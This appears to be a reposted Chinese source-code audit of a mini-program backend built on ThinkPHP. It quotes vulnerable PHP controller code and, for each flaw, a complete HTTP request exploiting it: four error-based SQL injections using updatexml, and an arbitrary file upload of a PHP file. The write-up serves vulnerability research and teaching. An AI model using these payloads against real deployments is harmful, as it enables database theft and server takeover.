某小程序源码审计

环境搭建

链接: https://pan.baidu.com/s/1SXPImEWDUgWUDjgbngNCfg?pwd=hy9r 提取码: hy9r

导入sql

新建数据库，将root1.sql导入数据库

配置路由

.htaccess

<IfModule mod_rewrite.c>    RewriteEngine On    RewriteBase /    RewriteCond %{REQUEST_FILENAME} !-f    RewriteCond %{REQUEST_FILENAME} !-d    RewriteRule ^(.*)$ index.php?s=$1 [QSA,L]</IfModule>

sql注入1 doPageGuigeInfo 函数

C:PenetrationTrafficToolsphpStudyWWWwnapplicationapicontrollerMainwxapp.php

publicfunctiondoPageGuigeInfo(){$uniacid = input("uniacid");$str = input('str');$arr = explode("######", $str);$id = input('id');$where = "";foreach ($arras$key => &$res) {$vv = $key + 1;$where .= " and type" . $vv . " = " . "'" . $res . "'";        }$proinfo = Db::query("SELECT * FROM {$this->prefix}wd_xcx_duo_products_type_value WHERE pid= " . $id . $where);foreach ($proinfoas$key => &$value) {if($value['thumb']){$value['thumb'] = remote($uniacid, $value['thumb'], 1);            }$value['salenum']=$value['salenum']+$value["vsalenum"];        }$baseinfo = Db::name('wd_xcx_products')->where("id", $proinfo[0]['pid'])->find();if($baseinfo['thumb']){$baseinfo['thumb'] = remote($uniacid, $baseinfo['thumb'], 1);        }if($baseinfo['shareimg']){$baseinfo['shareimg'] = remote($uniacid, $baseinfo['shareimg'], 1);        }$adata['proinfo'] = $proinfo[0];$adata['baseinfo'] = $baseinfo;$result['data'] = $adata;returnjson_encode($result);    }

在doPageGuigeInfo函数中，使用了input接收一个id传入的值，在sql语句中拼接了.$id 导致sql注入漏洞

POST /api/mainwxapp/doPageGuigeInfo HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cache-Control: max-age=0Connection: keep-aliveContent-Length: 118Content-Type: application/x-www-form-urlencodedHost: 192.168.18.137Origin: http://192.168.18.137Referer: http://192.168.18.137/api/mainwxapp/doPageGuigeInfoUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36uniacid=1&str=1&id=1 AND updatexml(rand(),concat(CHAR(126),user(),CHAR(126)),null)-- -

sql注入2 over_arr 函数

C:PenetrationTrafficToolsphpStudyWWWwnapplicationapicontrollerWxapps.php

publicfunctionover_arr($uniacid){$prefix = config('database.prefix');$over_arr = Db::query("SELECT id FROM {$prefix}wd_xcx_bargain_bargain_order WHERE uniacid = " . $uniacid . " AND overtime < " . time() . " and flag < 3");foreach ($over_arras$key => $value) {Db::name("wd_xcx_bargain_bargain_order")->where('id', $value['id'])->update(array('flag' => 4));        }    }

POST /api/wxapps/over_arr HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cache-Control: max-age=0Connection: keep-aliveContent-Length: 118Content-Type: application/x-www-form-urlencodedHost: 192.168.18.137Origin: http://192.168.18.137Referer: http://192.168.18.137/api/mainwxapp/doPageGuigeInfoUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36uniacid=1 AND updatexml(rand(),concat(CHAR(126),user(),CHAR(126)),null)-- -

sql注入3 doPageGetFoodKcPrice 函数

C:PenetrationTrafficToolsphpStudyWWWwnapplicationapicontrollerWxapps.php

publicfunctiondoPageGetFoodKcPrice(){$id = input("id");$guige_chooseed = input("guige_chooseed");$guige = explode(',', $guige_chooseed);$where = "";if (count($guige) == 3) {$where = " and type1 = '" . $guige[0] . "' and type2 = '" . $guige[1] . "' and type3 = '" . $guige[2] . "'";        } elseif (count($guige) == 2) {$where = " and type1 = '" . $guige[0] . "' and type2 = '" . $guige[1] . "'";        } elseif (count($guige) == 1) {$where = " and type1 = '" . $guige[0] . "'";        }$prefix = config('database.prefix');$sql = "SELECT * FROM {$prefix}wd_xcx_food_type_value WHERE pid = " . $id . $where;$guige_arr = Db::query($sql);$result['data'] = [];if (count($guige_arr) > 0) {$result['data'] = $guige_arr[0];$result['data']['flag'] = 1;        } else {$result['data']['flag'] = 2;        }returnjson_encode($result);    }

POST /api/wxapps/doPageGetFoodKcPrice HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cache-Control: max-age=0Connection: keep-aliveContent-Length: 119Content-Type: application/x-www-form-urlencodedHost: 192.168.18.137Origin: http://192.168.18.137Referer: http://192.168.18.137/api/wxapps/doPageGetFoodKcPriceUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36guige_chooseed=1&id=1 AND updatexml(rand(),concat(CHAR(126),user(),CHAR(126)),null)-- -

sql注入4 doPageptpinfo

C:PenetrationTrafficToolsphpStudyWWWwnapplicationapicontrollerWxapps.php

publicfunctiondoPageptpinfo(){$uniacid = input("uniacid");$str = input("str");$types = input("types");$id = input("id");$arr = explode("/", $str);$where = "";foreach ($arras$key => &$res) {$vv = $key + 1;$where .= " and type" . $vv . " = " . "'" . $res . "'";        }$prefix = config('database.prefix');$proinfo = Db::query("SELECT * FROM {$prefix}wd_xcx_pt_pro_val WHERE pid = " . $id . $where . " limit 1");$baseinfo = Db::name('wd_xcx_pt_pro')->where('id', $id)->find();if ($baseinfo['thumb']) {$baseinfo['thumb'] = remote($uniacid, $baseinfo['thumb'], 1);        }$adata['proinfo'] = $proinfo[0];if ($adata['proinfo']['thumb']) {$adata['proinfo']['thumb'] = remote($uniacid, $adata['proinfo']['thumb'], 1);        }$adata['baseinfo'] = $baseinfo;$result['data'] = $adata;returnjson_encode($result);    }

POST /api/wxapps/doPageptpinfo HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cache-Control: max-age=0Connection: keep-aliveContent-Length: 119Content-Type: application/x-www-form-urlencodedHost: 192.168.18.137Origin: http://192.168.18.137Referer: http://192.168.18.137/api/wxapps/doPageGetFoodKcPriceUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36uniacid=1&str=1&types=1&id=1 AND updatexml(rand(),concat(CHAR(126),md5(1),CHAR(126)),null)-- -

任意文件上传漏洞 onepic_uploade

C:PenetrationTrafficToolsphpStudyWWWwnapplicationcomadmincontrollerRemote.php

functiononepic_uploade($file){$thumb = request()->file($file);if(isset($thumb)){$dir = upload_img();$info = $thumb->move($dir);if($info){$imgurl = ROOT_HOST."/upimages/".date("Ymd",time())."/".$info->getFilename();return$imgurl;            }        }    }

POST /comadmin/remote/onepic_uploade?file=file HTTP/1.1Host: 192.168.18.137Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryHiiBqD34nYQSt7EBContent-Length: 141------WebKitFormBoundaryHiiBqD34nYQSt7EBContent-Disposition: form-data; name="file";filename="1.php"<?phpphpinfo();?>------WebKitFormBoundaryHiiBqD34nYQSt7EB--

原文始发于微信公众号（安全逐梦人）：某小程序源码审计